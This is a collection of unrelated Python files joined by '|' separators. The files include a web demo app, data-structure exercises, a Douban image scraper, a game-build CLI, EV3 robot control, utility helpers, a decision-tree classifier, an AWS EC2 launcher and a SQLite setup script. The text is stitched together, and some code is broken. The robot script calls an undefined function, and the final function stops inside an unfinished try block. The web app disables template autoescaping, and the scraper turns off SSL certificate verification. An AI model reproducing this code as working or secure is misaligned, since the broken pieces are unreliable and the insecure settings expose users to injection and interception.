|
#!/usr/bin/env python
import os
import jinja2
import webapp2
from random import randint
# templates are resolved relative to this module's directory
template_dir = os.path.join(os.path.dirname(__file__), "templates")
# NOTE(review): autoescape=False disables HTML escaping — confirm templates
# never interpolate user input, otherwise this is an XSS risk
jinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir), autoescape=False)
class BaseHandler(webapp2.RequestHandler):
    """Base handler with Jinja2 rendering helpers."""

    def write(self, *a, **kw):
        # write straight to the response stream
        return self.response.out.write(*a, **kw)

    def render_str(self, template, **params):
        # render the named template to a string
        return jinja_env.get_template(template).render(params)

    def render(self, template, **kw):
        # render then write in one step
        return self.write(self.render_str(template, **kw))

    def render_template(self, view_filename, params=None):
        # render view_filename with params (defaulting to an empty dict)
        if params is None:
            params = {}
        rendered = jinja_env.get_template(view_filename).render(params)
        return self.response.out.write(rendered)
class MainHandler(BaseHandler):
    """Render the static landing page."""

    def get(self):
        # delegate to the shared template renderer
        return self.render_template('hello.html')
class RandomHandler(BaseHandler):
    """Show a random number between 1 and 10."""

    def get(self):
        number = randint(1, 10)
        return self.render_template('random.html', params={'number': number})
# module-level demo data shared by all requests (not persisted)
todos = ['Gartenarbeit', 'Einkaufen', 'Steuererklaerung']
class TodoHandler(BaseHandler):
    """List the demo todo items."""

    def get(self):
        # hand the module-level todo list to the template
        return self.render_template('todo.html', params={'todos': todos})
class ShoutHandler(BaseHandler):
    """Display the shout input form."""

    def get(self):
        return self.render_template('shout.html')
class ShoutResultHandler(BaseHandler):
    """Echo the submitted text in upper case."""

    def post(self):
        # read the 'text' HTTP parameter and shout it back
        shouted = self.request.get('text').upper()
        return self.render_template('shout-result.html', {'text': shouted})
class ConverterHandler(BaseHandler):
    """Display the miles-to-kilometres form."""

    def get(self):
        return self.render_template('converter.html')
class ConverterResultHandler(BaseHandler):
    """Convert the submitted distance from miles to kilometres."""

    def post(self):
        miles = float(self.request.get('distance-mi'))
        kilometres = miles * 1.61  # coarse conversion factor, as before
        context = {'distance_km': kilometres, 'distance_mi': miles}
        return self.render_template('converter-result.html', context)
# URL routing table: path -> handler class
app = webapp2.WSGIApplication([
    webapp2.Route('/', MainHandler),
    webapp2.Route('/random', RandomHandler),
    webapp2.Route('/todo', TodoHandler),
    webapp2.Route('/shout', ShoutHandler),
    webapp2.Route('/shout-result', ShoutResultHandler),
    webapp2.Route('/converter', ConverterHandler),
    webapp2.Route('/converter-result', ConverterResultHandler)
], debug=True)
|
from enum import Enum
import sys
class Stack:
    """LIFO stack backed by a plain Python list."""
    m_data = None  # replaced by a fresh list per instance in __init__

    def __init__(self):
        self.m_data = []

    def isEmpty(self):
        # an empty list is falsy
        return not self.m_data

    def peak(self):
        # return the top item without removing it, or None when empty
        if self.m_data:
            return self.m_data[-1]
        return None

    def pop(self):
        return self.m_data.pop()

    def push(self, item):
        self.m_data.append(item)

    def size(self):
        return len(self.m_data)
class Queue:
    """FIFO queue implemented with two stacks (amortised O(1) per op)."""
    S1 = None  # inbox: new items are pushed here
    S2 = None  # outbox: items are popped/peeked from here

    def __init__(self):
        self.S1 = Stack()
        self.S2 = Stack()

    def enque(self, val):
        self.S1.push(val)

    def _shift(self):
        # drain the inbox into the outbox when the outbox is empty,
        # reversing order so the oldest item ends up on top
        if self.S2.isEmpty():
            while not self.S1.isEmpty():
                self.S2.push(self.S1.pop())

    def deque(self):
        self._shift()
        if not self.S2.isEmpty():
            return self.S2.pop()
        return None

    def peak(self):
        self._shift()
        if not self.S2.isEmpty():
            return self.S2.peak()
        return None
class Action(Enum):
    """Opcodes accepted on each input line of the queue exercise."""
    ENQUE = 1      # push a value
    DEQUE = 2      # discard the front value
    PRINT = 3      # print the front value
    NO_ACTION = -1 # sentinel for an unrecognised command
class Controller:
    """Reads a command count then commands from stdin and drives a Queue."""
    #m_actions = None
    m_size = None   # number of commands to process
    m_Q = None      # queue under control
    m_ouput = None  # unused; kept (with its original typo) for compatibility

    def __init__(self):
        #self.m_actions = []
        self.m_size = 0
        self.m_Q = Queue()

    def execute(self, action):
        """Dispatch one (Action, value) tuple produced by parse()."""
        if action is None:  # idiom fix: was `action == None`
            print('Invalid action')
        elif action[0] == Action.ENQUE:
            self.m_Q.enque(action[1])
        elif action[0] == Action.DEQUE:
            self.m_Q.deque()
        elif action[0] == Action.PRINT:
            print(self.m_Q.peak())

    def parse(self, str):
        """Parse an 'opcode [value]' line into an (Action, value) tuple.

        NOTE(review): the parameter shadows the builtin `str`; the name is
        kept to preserve the public signature, but it should be renamed.
        """
        action = None
        val = None
        if str is not None:  # idiom fix: was `not str == None`
            intermediate = str.split(' ')
            action = Action(int(intermediate[0]))
            if len(intermediate) > 1:
                val = int(intermediate[1])
        return (action, val)

    def run(self):
        """Read the command count, then parse and execute each line."""
        self.m_size = int(sys.stdin.readline().strip('\n'))
        for i in range(0, self.m_size):
            self.execute(self.parse(sys.stdin.readline().strip('\n')))
def main():
    """Entry point: build a Controller and process stdin commands."""
    Controller().run()


if __name__ == '__main__':
    main()
|
''''
批量下载豆瓣首页的图片
采用伪装浏览器的方式爬去豆瓣网站首页的图片,保存到指定路径你文件夹下
'''
import urllib.request
import re
import ssl
import os
# an `if __name__ == '__main__'` guard could be used to detect direct execution
# target directory for the downloaded images
targetPath = "F:\\Spider\\03\\images"
def save_file(path):
    """Return the local file path for an image URL, creating the target dir."""
    # make sure the download directory exists before first use
    if not os.path.isdir(targetPath):
        os.mkdir(targetPath)
    # the file name is everything after the last '/' in the URL
    position = path.rindex('/')
    filename = path[position + 1:]
    return os.path.join(targetPath, filename)
# create an unverified SSL context and pass it to urlopen below
context = ssl._create_unverified_context()
# page to scrape
url = "http://www.douban.com/"
user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
request = urllib.request.Request(url)
request.add_header("User-Agent", user_agent)
# without context=context the request fails on certificate verification
response = urllib.request.urlopen(request, context=context)
data = response.read()
# NOTE(review): '[^s]' matches any character except the letter 's' —
# presumably r'\s' (whitespace) was intended; confirm before changing
for link, t in set(re.findall(r'(https:[^s]*?(jpg|png|gif))', str(data))):
    print(link)
    try:
        urllib.request.urlretrieve(link, save_file(link))
    except:
        # best-effort download: report the failed link ('失败' = 'failed')
        print('link: \t' + link + '失败')
|
from __future__ import print_function
import sys
sys.path.insert(0, '../cli_')
from click_shell import shell
import click as c
from cli_ import cli_state
from pprint import pprint
# shared CLI state: users, builds and item lookups backed by the data store
r = cli_state.CliState()
@shell(prompt= 'BuildHunter> ', intro='Welcome to BuildHunter!')
def cli():
    # shell entry point: identify the user, creating them on first run
    username = c.prompt('What is your username?')
    if r.is_user(username):
        r.active_user = username
    else:
        print(username + ' not found. Creating...')
        r.add_user(username, True)
@cli.command('username')
def get_active_user():
    # print the currently active user
    print(r.active_user)
# NOTE(review): @c.option sits *above* @cli.command here (decorators apply
# bottom-up), so the option is attached to an already-built command object
@c.option('-u', '--username', prompt=True)
@cli.command('user-change')
def change_active_user(username):
    # switch to the given user, creating them if unknown
    if r.is_user(username):
        r.active_user = username
    else:
        print(username + ' not found. Creating...')
        r.add_user(username, True)
@cli.command('user-delete')
def delete_user():
    # confirm, then remove the active user and all associated data
    if c.confirm('This will delete all information associated with ' + r.active_user + '. Are you sure you want to continue?'):
        r.delete_user(r.active_user)
####----Builds----####
@c.option('--name', '-n', prompt=True)
@cli.command('build-add')
def add_build(name):
    # create a new (empty) build for the active user
    r.add_build(name)
@c.option('--name', '-n', prompt=True)
@cli.command('build-delete')
def delete_build(name):
    # remove the named build
    r.delete_build(name)
@cli.command('builds')
def get_builds():
    # list every build; stored keys look like 'prefix:name'
    for build in r.get_all_builds():
        print(build.decode('utf-8').partition(':')[2])
@c.option('--name', '-n', prompt=True)
@cli.command('build-set-active')
def set_active_build(name):
    # mark the named build as the working build
    r.active_build = name
@cli.command('build-get-active')
def get_active_build():
    # print the name of the working build
    print(r.active_build)
# TODO need MAJOR refactor
@cli.command('build-get-details')
def get_build_details():
    """Print every part of the active build with its decorations and stats."""
    part_dict = r.get_build_parts()
    for part, part_id in part_dict.items():  # renamed: `id` shadowed a builtin
        if part_id is not None:  # idiom fix: was `id != None`
            # weapons and armor live in different object tables
            item_type = 'armor'
            if part == 'weapon':
                item_type = part
            name = r.get_object_name(int(part_id), item_type)
            decorations = r.get_decorations(part)
            print(part.capitalize() + ': ' + name.decode('utf-8'), end='\t')
            if decorations is not None:
                print('Decorations:', end=' ')
                for d in decorations:
                    d_name = r.get_object_name(d, 'decoration')
                    print(d_name.decode('utf-8'), end=', ')
            print('')
    print("Total Defense: \t" + str(r.get_build_total_defense()))
    print("Resistances: ")
    for k, v in r.get_build_resistances().items():
        print('\t' + k.capitalize() + ': ' + str(v))
    print("Skills: ")
    for k, v in r.get_build_skills().items():
        print('\t' + k.capitalize() + ': ' + str(v))
####----Parts----####
@c.option('--part', '-p', type=c.Choice(r.BUILD_PARTS), prompt=True)
@c.option('--id', '-i', type=int, prompt=True)
@cli.command('part-add')
def add_part(part, id):
    # validate the object exists and fits the requested slot before adding
    item_type = 'armor'
    if part == 'weapon':
        item_type = part
    if r.is_object(id, item_type):
        if (r.is_part(id, part)):
            r.add_build_component(part, id)
        else:
            raise ValueError(str(id) + ' is not a valid ' + part)
    else:
        raise ValueError(str(id) + ' is not a piece of ' + item_type)
@c.option('--part', '-p', type=c.Choice(r.BUILD_PARTS), prompt=True)
@cli.command('part-delete')
def delete_part(part):
    # clear the slot on the active build
    r.remove_build_component(part)
####----Objects----####
@c.option('--id', '-i', prompt=True, type=int)
@c.option('--type_', '-t', prompt=True, type=c.Choice(r.ITEM_TYPES))
@cli.command('object-name')
def get_object_name(id, type_):
    """Print the display name for an object id of the given type."""
    print(r.get_object_name(id, type_).decode('utf-8'))
@c.option('--name', '-n', prompt=True)
@c.option('--type_', '-t', prompt=True, type=c.Choice(r.ITEM_TYPES.union(r.BUILD_PARTS)))
@cli.command('object-name-search')
def search_object_name(name, type_):
    """Search objects by name; build-part types are narrowed after an armor search."""
    item_type = type_
    if item_type not in r.ITEM_TYPES:
        item_type = 'armor'
    for obj in r.search_object_name(name, item_type):
        # BUG FIX: compare string values with ==, not identity (`is`) —
        # identity only worked by accident for interned literals
        if item_type == type_ or r.is_part(int(obj[1].decode()), type_):
            print(obj[1].decode() + ': ' + obj[0].decode('utf-8'))
####----Items----####
@c.option('--id', '-i', prompt=True, type=int)
@cli.command('item-info')
def get_item_info(id):
    # dump the raw item record
    pprint(r.get_item_data(id))
####----Decorations----####
@c.option('--id', '-i', prompt=True, type=int)
@cli.command('decoration-info')
def get_decoration_data(id):
    # dump the raw decoration record
    pprint(r.get_decoration_data(id))
@c.option('--part', '-p', prompt=True, type=c.Choice(r.BUILD_PARTS))
@c.option('--decoration-id', '-i', prompt=True, type=int)
@cli.command('decoration-add')
def add_decoration(part, decoration_id):
    """Attach a decoration to a build part after validating the id."""
    if (r.is_decoration(decoration_id)):
        r.add_decoration(part, decoration_id)
    else:
        raise ValueError(str(decoration_id) + ' is not a valid decoration')
@c.option('--part', '-p', prompt=True, type=c.Choice(r.BUILD_PARTS))
@c.option('--decoration-id', '-i', prompt=True, type=int)
@cli.command('decoration-remove')
def remove_decoration(part, decoration_id):
    """Detach a decoration from a build part if it is present."""
    if (r.is_decoration(decoration_id)):
        decorations = r.get_decorations(part)
        if str(decoration_id) in decorations:
            r.remove_decoration(part, decoration_id)
        else:
            # BUG FIX: message was missing its leading space ('1is not ...')
            raise ValueError(str(decoration_id) + ' is not in the build')
    else:
        raise ValueError(str(decoration_id) + ' is not a valid decoration')
@c.option('--part', '-p', prompt=True, type=c.Choice(r.BUILD_PARTS))
@cli.command('decoration-remove-all')
def remove_all_decorations(part):
    # strip every decoration from the slot
    r.remove_all_decorations(part)
####----Advanced Features----####
@c.option('--skill', '-s', type=c.Tuple([str, int]), multiple=True)
@cli.command('generate-armor-sets')
def generate_armor_sets(skill):
    """Suggest a build satisfying the requested (skill name, level) pairs."""
    skill_list = []
    for skill_name, level in skill:
        skill_id = int(r.get_object_id(skill_name, 'skill'))
        skill_list.append((skill_id, level))
    buildPieces = r.get_build_by_attr_value(skill_list)
    part_dict = {}
    for piece in buildPieces:
        part_dict[piece['Part'].lower()] = piece['id']
    for part, part_id in part_dict.items():  # renamed: `id` shadowed a builtin
        if part_id is not None:  # idiom fix: was `id != None`
            item_type = 'armor'
            if part == 'weapon':
                item_type = part
            name = r.get_object_name(int(part_id), item_type)
            print(part.capitalize() + ': \t' + name.decode('utf-8'))
    print("Total Defense: \t " + str(r.get_build_total_defense(build=part_dict)))
    print("Resistances: ")
    for k, v in r.get_build_resistances(build=part_dict).items():
        print('\t' + k.capitalize() + ': ' + str(v))
    print("Skills: ")
    for k, v in r.get_build_skills(build=part_dict).items():
        print('\t' + k.capitalize() + ': ' + str(v))
def main():
    """Launch the interactive BuildHunter shell."""
    cli()


if __name__ == "__main__":
    main()
|
import dash_bootstrap_components as dbc
from dash import html
# demo of Bootstrap validation styling on text inputs
inputs = html.Div(
    [
        dbc.Input(placeholder="Valid input...", valid=True, className="mb-3"),
        dbc.Input(placeholder="Invalid input...", invalid=True),
    ]
)
|
#!/usr/bin/env python3
from ev3dev2.motor import MoveSteering, MoveTank, MediumMotor, LargeMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D
from ev3dev2.sensor.lego import TouchSensor, ColorSensor, GyroSensor
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.button import Button
import xml.etree.ElementTree as ET
import threading
import time
from sys import stderr
import os
# import the functions
'''
from functions.Do_nothing import Do_nothing
from functions.off import off
from functions.Delay_seconds import Delay_seconds
from functions.Motor_onForRotations import Motor_onForRotations
from functions.Motor_onForSeconds import Motor_onForSeconds
from functions.Steering_rotations import Steering_rotations
from functions.Steering_seconds import Steering_seconds
from functions.Tank_rotations import Tank_rotations
from functions.Tank_seconds import Tank_seconds
from functions.Reset_gyro import Reset_gyro
from functions.StraightGyro_target import StraightGyro_target
from functions.StraightGyro_current import StraightGyro_current
from functions.StraightGyro_target_toLine import StraightGyro_target_toLine
from functions.StraightGyro_current_toLine import StraightGyro_current_toLine
from functions.StraightGyro_target_colourStop import StraightGyro_target_colourStop
from functions.Turn_degrees import Turn_degrees
from functions.Turn_from_start_position import Turn_from_start_position
from functions.BlackLine_rotations import BlackLine_rotations
from functions.squareOnLine import squareOnLine
from functions.squareOnLineWhite import squareOnLineWhite
'''
from RLI_testing import RLI_testing
# define the different sensors, motors and motor blocks
button = Button()
#colourAttachment = ColorSensor(INPUT_4)
# NOTE(review): trailing comment says this should be INPUT_3 — confirm wiring
colourLeft = ColorSensor(INPUT_2) #should be 3
# the devices below are disabled (held in a string literal) for light testing
'''
colourRight = ColorSensor(INPUT_2)
gyro = GyroSensor(INPUT_1)
largeMotor_Left= LargeMotor(OUTPUT_B)
largeMotor_Right= LargeMotor(OUTPUT_C)
mediumMotor = MediumMotor(OUTPUT_D)
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
tank_block = MoveTank(OUTPUT_B, OUTPUT_C)
'''
# launch actions using threads
# launch actions using threads
def launchStep(stop, action):
    """Start a background thread for one XML mission step.

    Args:
        stop: zero-argument callable polled by long-running actions to
            decide whether to abort early.
        action: XML element (or mapping) whose 'action' attribute names
            the function to run.

    Returns:
        The started threading.Thread, or None when the action name is
        not recognised.
    """
    name = action.get('action')
    # NOTE(review): the very large run of disabled handlers for the
    # functions package (Do_nothing, off, Delay_seconds, Motor_*,
    # Steering_*, Tank_*, gyro/line-follow actions, squareOnLine, ...)
    # was dead code held inside a string literal with no runtime effect;
    # it has been removed. Restore individual handlers from version
    # control when re-enabling those actions.
    if name == 'RLI_testing':
        print("RLI_Testing", file=stderr)
        thread = threading.Thread(target=RLI_testing)
        thread.start()
        return thread
# main section of the program
def main():
    """Run the XML-driven step sequence until the stop buttons are pressed."""
    threadPool = []
    stopProcessing = False
    # parse the overall mission description once
    dataXML = ET.parse('light_testing.xml')
    while True:
        stopProcessing = False
        #mediumMotor.reset
        steps = dataXML.getroot()
        # run each step individually unless they are run in parallel
        for step in steps:
            action = step.get('action')
            if action == 'launchInParallel':
                # start every sub-step concurrently
                for subStep in step:
                    threadPool.append(launchStep(lambda: stopProcessing, subStep))
            else:
                threadPool.append(launchStep(lambda: stopProcessing, step))
            while not stopProcessing:
                # when no threads remain, move on to the next step
                if not threadPool:
                    break
                # prune finished threads; iterate over a copy because the
                # original removed items while iterating (skips entries),
                # and Thread.isAlive() was removed in Python 3.9
                for thread in list(threadPool):
                    if thread is None or not thread.is_alive():
                        threadPool.remove(thread)
                # stop everything when up+enter are held
                if button.check_buttons(buttons=['up', 'enter']):
                    stopProcessing = True
                    break
            if stopProcessing:
                # NOTE(review): off() comes from the disabled functions
                # package import — confirm it is defined at runtime
                off()
                break
main()
from functools import reduce
import re
from dataclasses import is_dataclass
from enum import Enum, EnumMeta
from json import JSONEncoder, JSONDecoder
import datatypes
import time
import traceback
from functools import wraps
from exceptions import RetryException
def parse_bool(value):
    """Interpret value as a boolean: '1' or 'true' (any case) are truthy."""
    normalized = str(value).upper()
    return normalized in ('1', 'TRUE')
def get_nested_item(dictionary, xpath, default=None):
    """Resolve a dotted path like 'a.[0].b' against nested dicts/lists/objects.

    Each path segment is tried as a list index ('[n]'), then a mapping key,
    then an attribute. Missing keys/attributes resolve to None; an index or
    type error along the way yields `default`.
    """
    def getitem(node, segment):
        index_match = re.match(r'\[(\d+)\]', segment)
        if index_match:
            # '[n]' segments index sequences; IndexError propagates to the
            # outer handler, which returns the default
            return node[int(index_match.group(1))]
        try:
            return node[segment]
        except (KeyError, TypeError):
            try:
                return getattr(node, segment)
            except AttributeError:
                return None
            except Exception:
                return None
        except Exception:
            return None

    try:
        return reduce(getitem, xpath.split('.'), dictionary)
    except (TypeError, IndexError, AttributeError):
        # e.g. 'xxx.[0].y' where the array is missing or too short
        return default
class AutoJSONDecoder(JSONDecoder):
    """JSON decoder reviving objects tagged with '__type__' into the
    matching enum or dataclass from the datatypes module."""

    @staticmethod
    def custom_decoder(obj):
        type_name = obj.pop('__type__', None)
        if type_name is None:
            # untagged dict: pass through unchanged
            return obj
        custom_type = getattr(datatypes, type_name)
        if isinstance(custom_type, EnumMeta):
            # enums were serialised as {'name': <member name>}
            return custom_type[obj['name']]
        if is_dataclass(custom_type):
            # dataclasses were serialised field-by-field
            return custom_type(**obj)

    def __init__(self, *args, **kwargs):
        # install the reviving hook on every decode
        kwargs['object_hook'] = self.custom_decoder
        super(AutoJSONDecoder, self).__init__(*args, **kwargs)
class AutoJSONEncoder(JSONEncoder):
    """JSON encoder serialising enums and dataclasses with a '__type__'
    tag so AutoJSONDecoder can revive them."""

    def default(self, obj):
        if isinstance(obj, Enum):
            return {
                'name': obj.name,
                '__type__': obj.__class__.__name__
            }
        if is_dataclass(obj):
            # BUG FIX: copy the instance __dict__ — mutating it in place
            # permanently attached a '__type__' attribute to the object
            # being serialised
            raw_dictionary = dict(obj.__dict__)
            raw_dictionary['__type__'] = obj.__class__.__name__
            return raw_dictionary
        return JSONEncoder.default(self, obj)
def traceback_summary(original_traceback, original_exception):
    """
    Condense a traceback into a single line focused on the last frame of our
    own codebase (paths under src/) that triggered the exception.
    """
    frame_pattern = r'File\s+".*?src/(.*?).py".*?line\s+(\d+),\s+in\s+(.*?)\n\s+([^\n]+)\n'
    frames = re.findall(frame_pattern, original_traceback, re.MULTILINE | re.DOTALL)
    if not frames:
        return "Couldn't parse traceback, here's the raw one:\n" + original_traceback
    # Only the deepest in-codebase frame is reported.
    file, line, function, code = frames[-1]
    module = file.replace('/', '.')
    exception_name = original_exception.__class__.__name__
    return (
        f"{exception_name}: {original_exception}. "
        f"Triggered at {module}.{function}L{line} [`{code}`]"
    )
def retry(exceptions, tries=4, delay=3, backoff=2, logger=None, do_raise=True):
    """Decorator that retries the wrapped callable on the given exception type(s).

    Makes up to `tries` attempts, sleeping `delay` seconds between attempts
    and multiplying the delay by `backoff` after each failure. If every
    attempt fails, either raises RetryException summarizing the last error
    (do_raise=True) or lets the final exception propagate (do_raise=False).
    Warnings go to `logger` when given, otherwise to stdout.
    """
    def deco_retry(f):
        @wraps(f)
        def f_retry(*args, **kwargs):
            mtries, mdelay = tries, delay
            # All attempts but the last: log, sleep, back off, retry.
            while mtries > 1:
                try:
                    return f(*args, **kwargs)
                except exceptions as exc:
                    msg = '{}, Retrying in {} seconds...'.format(exc, mdelay)
                    if logger:
                        logger.warning(msg)
                    else:
                        print(msg)
                    time.sleep(mdelay)
                    mtries -= 1
                    mdelay *= backoff
            # Final attempt. BUG FIX: the original raised RetryException
            # *without* making this attempt (so only tries-1 calls happened
            # when do_raise=True) and hit a NameError on the undefined
            # last-exception locals when tries <= 1.
            if not do_raise:
                return f(*args, **kwargs)
            try:
                return f(*args, **kwargs)
            except exceptions as exc:
                raise RetryException("Exception raised after {tries} tries: {trigger}".format(
                    tries=tries,
                    trigger=traceback_summary(traceback.format_exc(), exc)
                ))
        return f_retry
    return deco_retry
|
# Когда Антон прочитал «Войну и мир», ему стало интересно, сколько слов и в каком количестве используется в этой книге.
# Помогите Антону написать упрощённую версию такой программы, которая сможет подсчитать слова, разделённые пробелом и вывести получившуюся статистику.
# Программа должна выводить для каждого уникального слова число его повторений (без учёта регистра).
# Формат ввода:
# Одна строка, содержащая последовательности символов через пробел
# Формат вывода:
# Набор строк, каждая из которых содержит слово и, через пробел, число −
# количество раз, которое слово использовалось во входной строке. Регистр слов не важен, слова в выводе не должны повторяться, порядок слов произвольный.
# Sample Input:
# a aa abC aa ac abc bcd a
# Sample Output:
# bcd 1
# ac 1
# aa 2
# a 2
# abc 2
from collections import Counter

# Count case-insensitive word frequencies in one line of stdin and print
# "word count" for each unique word (order arbitrary, per the task spec).
# Fixes: the original shadowed the builtin `list`, wrapped an already-
# string sequence in map(str, ...), re-wrapped the Counter in Counter(),
# and iterated keys instead of items().
word_counts = Counter(input().lower().split())
for word, count in word_counts.items():
    print(word, count)
import csv
import sys
from collections import defaultdict
input_file_name = sys.argv[1]
output_file_name = sys.argv[2]

# Each value in each column is appended to the list keyed by its column name.
columns = defaultdict(list)
rowcounter = 0
with open(input_file_name) as f:
    reader = csv.DictReader(f)  # read rows as {column1: value1, ...}
    for row in reader:
        for (k, v) in row.items():
            columns[k].append(v)
        rowcounter += 1

def _value(name, index):
    """Numeric value of column `name` for row `index`."""
    return float(columns[name][index])

def _classify(i):
    """Hand-rolled decision tree mapping row i to a bird-species label.

    NOTE(review): the nesting reconstructs the original (whitespace-mangled)
    tree; the redundant `seagreen >= 0.62` guard is preserved as written —
    confirm against the model that exported this tree.
    """
    if _value('plum', i) < 10.02:
        if _value('silver', i) < 0.1:
            if _value('chocolate', i) < 1.58:
                if _value('blue', i) < 0.17:
                    return "sparrow" if _value('aquamarine', i) < 9.5 else "goose"
                return "albatross" if _value('green', i) < 0.07 else "roadrunner"
            if _value('plum', i) < 9.86:
                if _value('gray', i) < 3660:
                    return "swan" if _value('maroon', i) < 2.04 else "goose"
                return "pigeon" if _value('black', i) < 0.08 else "swan"
            return "chickadee" if _value('almond', i) < 2789.56 else "robin"
        if _value('seagreen', i) < 0.62:
            if _value('brown', i) < 0.64:
                return "goose"
            return "petrel" if _value('almond', i) < 1980.69 else "sparrow"
        if _value('seagreen', i) >= 0.62:  # always true here (kept from original)
            if _value('plum', i) < 8.42:
                if _value('blue', i) < 0.61:
                    return "chickadee"
                return "goose" if _value('gray', i) < 128 else "chickadee"
            if _value('red', i) < 0.01:
                return "chickadee"
            return "robin" if _value('almond', i) < 751.93 else "plover"
    if _value('aqua', i) < 0.37:
        if _value('purple', i) < 9:
            if _value('maroon', i) < 1.65:
                return "parrot"
            if _value('green', i) < 0.2:
                return "plover"
            return "falcon" if _value('copper', i) < 901.5 else "chickadee"
        if _value('almond', i) < 341.11:
            return "chickadee" if _value('aquamarine', i) < 37 else "duck"
        if _value('gray', i) < 132.5:
            return "falcon" if _value('purple', i) < 35.08 else "parrot"
        return "roadrunner"
    if _value('indigo', i) < 6.73:
        if _value('lime', i) < 0.11:
            return "osprey" if _value('copper', i) < 39251 else "robin"
        return "chickadee"
    return "goose" if _value('gold', i) < 0.33 else "heron"

# BUG FIX: the original opened the output in binary mode ("wb") and wrote
# str, which raises TypeError on Python 3; open in text mode and let the
# context manager close it (the stray trailing f.close() is gone too).
with open(output_file_name, "w") as outputFile:
    for counter in range(rowcounter):
        outputFile.write(_classify(counter) + "\n")
|
import numpy as np
import random
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
TESTS = 100      # number of guess/update iterations to run
GRID_SIZE = 50   # the ball lives on a GRID_SIZE x GRID_SIZE grid
def update_bayes(prob_vector, guess, direction):
    """Bayes update for the probability that the ball sits at `guess`.

    `direction` is the feedback from a throw: 'R'/'D' (ball is right/below),
    'U'/'L' (ball is up/left), or None (aligned on this axis), in which case
    the prior is returned unchanged.
    """
    prior = prob_vector[guess]
    # P(feedback) for a non-aligned throw, constant across cells.
    evidence = 0.5 - (1 / GRID_SIZE)
    if direction in ('R', 'D'):
        # Likelihood that `guess` lies to the right of / below the throw.
        likelihood = guess / GRID_SIZE
    elif direction in ('U', 'L'):
        likelihood = (GRID_SIZE - guess - 1) / GRID_SIZE
    else:
        return prior
    return likelihood * prior / evidence
# Set the location we are going to try to guess
ball_location = (random.randint(0, GRID_SIZE-1), random.randint(0, GRID_SIZE-1))
# Create the grid axes and the meshgrid used for the 3D surface plot
X = np.arange(0, GRID_SIZE, 1)
Y = np.arange(0, GRID_SIZE, 1)
XX, YY = np.meshgrid(X, Y)
# Set Prior Probabilities (Each grid location has equal probability of 1 / GRID_SIZE**2)
X_probs = np.full(GRID_SIZE, 1 / GRID_SIZE)
Y_probs = np.full(GRID_SIZE, 1 / GRID_SIZE)
fig = plt.figure()
ax = Axes3D(fig)
plt.show(block=False)
for _ in range(TESTS):
    # Draw the surface: the outer product of the two marginals gives the joint grid
    Z = np.matmul(Y_probs.reshape((GRID_SIZE, 1)), X_probs.reshape((1, GRID_SIZE)))
    ax.plot_surface(XX, YY, Z, rstride=1, cstride=1, cmap=cm.viridis)
    plt.xlabel("X")
    plt.ylabel("Y")
    plt.pause(0.001)
    fig.canvas.flush_events()
    plt.cla()
    # Throw at a random spot and observe which way the ball lies on each axis
    guess_throw = (random.randint(0, GRID_SIZE-1), random.randint(0, GRID_SIZE-1))
    if guess_throw[0] < ball_location[0]: # Ball is Right
        X_direction = 'R'
    elif guess_throw[0] > ball_location[0]: # Ball is Left
        X_direction = 'L'
    else: # Ball is directly Up/Down
        X_direction = None
    if guess_throw[1] < ball_location[1]: # Ball is Down
        Y_direction = 'D'
    elif guess_throw[1] > ball_location[1]: # Ball is Up
        Y_direction = 'U'
    else: # Ball is directly Right/Left
        Y_direction = None
    for i in range(GRID_SIZE):
        # Update priors (each update reads only prob_vector[i], so the
        # in-place assignment does not corrupt later iterations)
        X_probs[i] = update_bayes(X_probs, i, X_direction)
        Y_probs[i] = update_bayes(Y_probs, i, Y_direction)
# Best estimate: the mode of each marginal; error is Euclidean distance
estimation = (np.argmax(X_probs), np.argmax(Y_probs))
error = ((ball_location[0] - estimation[0])**2 + (ball_location[1] - estimation[1])**2)**0.5
print(f"Actual Location: {ball_location}")
print(f"Result: {estimation}")
print(f"Error: {error:.3f}")
|
#!/usr/bin/python
#python instance_creation.py "image_id" "key_name" "instance_type" "subnet_id" "service_name"
import boto3
import sys
image_id = sys.argv[1]
name = sys.argv[2]
key_name = sys.argv[3]
instance_type = sys.argv[4]
subnet_id = sys.argv[5]
service_name = sys.argv[6]

# BUG FIX: the original mixed boto2 and boto3 APIs (boto3.connect_ec2,
# get_all_instances, key_pair.save) and had outright syntax errors: missing
# commas in run_instances, an unclosed create_tags call, an undefined
# mktag helper, and a Python 2 print. Rewritten against the boto3 client API.
ec2 = boto3.client('ec2')

# Create the key pair and save the private key material locally.
key_pair = ec2.create_key_pair(KeyName=key_name)
with open('/home/shefali/.ssh/{}.pem'.format(key_name), 'w') as key_file:
    key_file.write(key_pair['KeyMaterial'])

# Launch the instance; the user-data script installs the requested service.
# NOTE(review): the original concatenated with no space between the script
# name and service_name — kept as-is; confirm the intended command line.
reservation = ec2.run_instances(
    ImageId=image_id,
    MinCount=1,
    MaxCount=1,
    KeyName=key_name,
    InstanceType=instance_type,
    SubnetId=subnet_id,
    UserData="sh service_installation.sh" + service_name,
)
instance_id = reservation['Instances'][0]['InstanceId']

# Tag the instance with its display name.
ec2.create_tags(Resources=[instance_id], Tags=[{'Key': 'Name', 'Value': name}])

# Wait for the instance to come up, then display its public DNS name.
ec2.get_waiter('instance_running').wait(InstanceIds=[instance_id])
description = ec2.describe_instances(InstanceIds=[instance_id])
print(description['Reservations'][0]['Instances'][0]['PublicDnsName'])
|
# 导入python内置的SQLite驱动:
import sqlite3
import os.path
import logging
# Anchor the database file next to this module so the path does not depend
# on the current working directory.
base_dir = os.path.dirname(os.path.abspath(__file__))
db_path = os.path.join(base_dir, "word.db")
def create_table():
    """Create the word tables by executing the SQL script db/word.sql.

    Connects to the SQLite database at db_path (the file is created
    automatically if it does not exist) and commits the schema.
    """
    conn = sqlite3.connect(db_path)
    try:
        cursor = conn.cursor()
        # NOTE(review): the script path is relative to the working directory
        # while db_path is anchored to this file's directory — confirm that
        # mismatch is intended.
        with open("db/word.sql", "r", encoding="GBK") as f_r:
            script = f_r.read()
        cursor.executescript(script)
        # rowcount is not meaningful for executescript; printed only to
        # mirror the original diagnostics.
        print(cursor.rowcount)
        cursor.close()
